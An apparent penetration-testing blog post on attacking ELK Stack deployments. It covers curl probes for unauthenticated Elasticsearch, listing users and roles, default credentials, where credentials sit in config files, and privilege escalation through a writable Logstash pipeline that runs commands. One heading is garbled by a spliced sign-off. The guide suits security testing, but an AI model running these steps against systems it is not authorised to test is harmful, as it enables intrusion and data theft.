With this blog post, I will provide information on how to proceed when testing ELK Stack landscapes. Information regarding the exploitation of the ELK Stack is very rare on the internet. Therefore, following article aims to provide you with some approaches that can be useful during a penetration test.

Disclaimer:

All information below were collected during a research project and there is no claim for completeness. The guide focuses on ELK Stack deployments for Linux machines. Further, this article does not include information for identifying misconfigurations in a white-box configuration audit.

Background

The ELK stack describes a stack that consists of three open-source projects: Elasticsearch, Logstash and Kibana. Elasticsearch stores data and provides a fast search engine. Kibana is a graphical interface which allows the analysis and visualization of the stored data in Elasticsearch. Logstash is used to collect data from different sources and for saving it into Elasticsearch.

Documentation

The documentation for the ELK Stack is very detailed and can be found here:

Important Configuration Files

  • Elasticsearch configuration: /etc/elasticsearch/elasticsearch.yml
  • Kibana configuration: /etc/kibana/kibana.yml
  • Logstash configuration: /etc/logstash/logstash.yml
  • Filebeat configuration: /etc/filebeat/filebeat.yml

The configuration files may contain credentials. It is always worth taking a look!

Elasticsearch

Elasticsearch is written in Java. Its API runs per default on port 9200 and can be used to store, update, delete or query data. Data is stored into schema-free JSON-Documents. Each document has a key which identifies it. All documents with the same type are stored into one index. There can be several indices.

Authentication disabled?

Authentication is not always enabled by default. There might be a chance that all stored data can be accessed.

The first step is to check whether you can get the version:

curl -X GET "ELASTICSEARCH-SERVER:9200/"
{
  "name" : "userver",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "lZNH15okQPWfNHp-Aks0OQ",
  "version" : {
    "number" : "7.9.3",
    "build_flavor" : "default",
    "build_type" : "deb",
    "build_hash" : "c4138e51121ef06a6404866cddc601906fe5c868",
    "build_date" : "2020-10-16T10:36:16.141335Z",
    "build_snapshot" : false,
    "lucene_version" : "8.6.2",
    "minimum_wire_compatibility_version" : "6.8.0",
    "minimum_index_compatibility_version" : "6.0.0-beta1"
  },
  "tagline" : "You Know, for Search"
}

If the information above is accessible, authentication most likely is disabled. In the second step, you can verify if authentication is disabled:

curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
{"error":{"root_cause":[{"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."}],"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."},"status":500}

In this case authentication is disabled and all data should be accessible. To dump the data, take a look at the API documentation of Elasticsearch [1].

Authentication enabled?

If following response is received, authentication is enabled:

curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}

In this case the only way to gain access is Brute-Force. Built-in users are:

  • elastic (This is the superuser! Older versions of Elasticsearch have the default password changeme for this user)

If you were able to receive the version although authentication is enabled, anonymous access is possible. The anonymous username most likely is _anonymous.

Anonymous access or valid credentials?

When having anonymous access or if valid credentials or an API key is found, following requests can be made to gather more information:

  • Using the API key:

    curl -H "Authorization: ApiKey <API-KEY>" ELASTICSEARCH-SERVER:9200/
  • Get more information about the rights of an user:

    curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
  • List all users on the system:

    curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user"
  • List all roles on the system:

    curl -X GET "ELASTICSEARCH-SERVER:9200/_security/role

From here on you can dump the data accessible by you user.

Enabled SSL/TLS?

If SSL/TLS is not enabled, it should be evaluated, whether sensitive information can be leaked. Further, if an other service is making authenticated requests to Elasticsearch (e.g. Kibana or Logstash), it can be tried to capture the traffic and read out the Base64 encoded username and password from the request.

Having access to the Elasticsearch machine?

When having compromised an Elasticsearch instance, also take a look at the /etc/elasticsearch/users_roles file. It could contain usernames and password hashes.

Kibana

Kibana provides search and data visualization capabilities for data indexed in Elasticsearch. The service runs per default on port 5601. Kibana also acts as the user interface for monitoring, managing, and securing an Elastic Stack cluster.

Authentication?

Authentication in Kibana is linked to the credentials from Elasticsearch. If authentication is disabled in Elasticsearch, Kibana also should be accessible without credentials. Otherwise the same credentials valid for Elasticsearch should be working when logging in to Kibana. The rights of the users in Elasticsearch are the same as in Kibana.

You might find credentials in the configuration file /etc/kibana/kibana.yml. If those credentials are not for the user kibana_system, it should be tried to use them for accessing further data. They could have more rights then the kibana_system user, which only has access to the monitoring API and the .kibana index.

Having Access?

When having access to Kibana you can do several things:

  • Try to access data from Elasticsearch
  • Check if you can access the users panel and if you can edit, delete or create new users, roles or API Keys (Stack Management -> Users/Roles/API Keys)
  • Check the current version for vulnerabilities (There was a RCE vulnerability in 2019 for Kibana versions < 6.6.0 [2])

Enabled SSL/TLS?

If SSL/TLS is not enabled, it should be evaluated, whether sensitive information can be leaked.

Logstash

Logstash is the last service of the ELK stack and is used for collecting, transforming and outputting logs. This is realized by using pipelines, which contain input, filter and output modules. The service gets interesting when having compromised a machine which is running Logstash as a service.

Any pipelines?

The pipeline configuration file /etc/logstash/pipelines.yml specifies the locations of active pipelines:

# This file is where you define your pipelines. You can define multiple.
# For more information on multiple pipelines, see the documentation:
# https://www.elastic.co/guide/en/logstash/current/multiple-pipelines.html

- pipeline.id: main
  path.config: "/etc/logstash/conf.d/*.conf"
- pipeline.id: example
  path.config: "/usr/share/logstash/pipeline/1*.conf"
  pipeline.workers: 6

In here you can find the paths to the .conf files, which contain the configured pipelines. If the Elasticsearch output module is used, pipelines are likely to contain valid credentials for an Elasticsearch instance. Those credentials have often more privileges, since Logstash has to write data to Elasticsearch. If wildcards are used, Logstash tries to run all pipelines located in that folder matching the wildcard.

Privesc withCheers,
Gregor writable pipelines?

Before trying to elevate your own privileges you should check which user is running the logstash service, since this will be the user, you will be owning afterwards. You should evaluate if it is worth it trying this approach! Per default the logstash service runs with the privileges of the logstash user.

Check whether you have one of the required rights:

  • You have write permissions on a pipeline .conf file or
  • /etc/logstash/pipelines.yml contains a wildcard and you are allowed to write into the specified folder

Further one of the requirements must be met:

  • You are able to restart the logstash service or
  • /etc/logstash/logstash.yml contains the entry config.reload.automatic: true

If a wildcard is specified, try to create a file matching that wildcard. Following content can be written into the file to execute commands:

input {
  exec {
    command => "whoami"
    interval => 120
  }
}

output {
  file {
    path => "/tmp/output.log"
    codec => rubydebug
  }
}

The interval specifies the time in seconds. In this example the whoami command is executed every 120 seconds. The output of the command is saved into /tmp/output.log.

If /etc/logstash/logstash.yml contains the entry config.reload.automatic: true you only have to wait until the command gets executed, since Logstash will automatically recognize new pipeline configuration files or any changes in existing pipeline configurations. Otherwise trigger a restart of the logstash service.

If no wildcard is used, you can apply those changes to an existing pipeline configuration. Make sure you do not break things!

Analysis of the configured input sources

Questions for an white-box audit:

  • Is sensitive data loaded via. unencrypted channels?
  • Are the input sources properly protected? Can an attacker inject malicious/manipulated log entries?

Black-box pentesting without access to the Logstash configuration:

Cheers,

Gregor

References

[1] https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html
[2] https://github.com/LandGrey/CVE-2019-7609/